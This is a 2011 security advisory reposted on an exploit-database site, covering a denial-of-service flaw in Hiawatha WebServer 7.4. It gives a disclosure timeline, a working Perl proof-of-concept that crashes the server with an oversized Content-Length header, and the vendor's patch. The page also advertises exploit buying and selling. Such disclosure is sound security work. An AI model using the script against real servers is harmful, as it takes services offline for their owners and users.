0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Hiawatha WebServer 7.4 Denial of Service Vulnerability
[[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):
[Software]
- Hiawatha WebServer 7.4
[Vendor Product Description]
- Hiawatha is an open source webserver with a focus on security. I
started Hiawatha in January 2002. Before that time, I had used several
webservers, but I didn't like them. They had unlogical, almost cryptic
configuration syntax and none of them gave me a good feeling about
their security and robustness. So, I decided it was time to write my
own webserver. I never thought that my webserver would become what it
is today, but I enjoyed working on it and liked to have my own open
source project. In the years that followed, Hiawatha became a fully
functional webserver.
- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz
[Advisory Timeline]
- 02/24/2011 -> Advisory sent to vendor.
- 02/24/2011 -> Vendor response.
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.
[Bug Summary]
- Content-Length entity-header filed miscalculation.
[Impact]
- Low
[Affected Version]
- 7.4
- Prior versions can also be affected but weren't tested.
[Bug Description and Proof of Concept]
- The web server crashes while sending specially crafted HTTP requests
leading to Denial of Service.
[PoC]
# Hiawatha Web Server 7.4
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "OPTIONS * HTTP/1.1\r\n";
print $socket "Host: http://www.dclabs.com.br\r\n";
print $socket "Content-Length: 2147483599\r\n\r\n";
sleep(3);
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}
All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br
[Patch(s) / Workaround]
-- hiawatha.c --
-- BEGIN --
20a21
> #include <limits.h>
421c422
< if
(content_length < 0) {
---
> if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {
-- END --
[Greetz]
DcLabs Security Research Group.
# 0day.today [2024-09-28] #